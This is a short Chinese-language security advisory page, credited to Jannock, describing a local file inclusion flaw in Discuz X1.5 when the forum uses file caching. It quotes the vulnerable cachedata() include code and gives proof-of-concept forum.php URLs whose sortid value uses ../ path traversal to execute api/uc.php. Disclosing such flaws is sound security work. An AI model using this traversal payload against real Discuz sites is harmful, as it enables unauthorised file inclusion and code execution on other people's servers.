DISCUZ X1.5 本地文件包含漏洞

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

  config_global.php

  $_config['cache']['type'] = ‘file’;

  function cachedata($cachenames) {

  ……

  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;

  ……

  if($isfilecache) {

  $lostcaches = array();

  foreach($cachenames as $cachename) {

  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

  $lostcaches[] = $cachename;

  }

  }

  ……

  }

  地址:

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

  执行了 api/uc.php 页面代码了。

  作者: Jannock

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by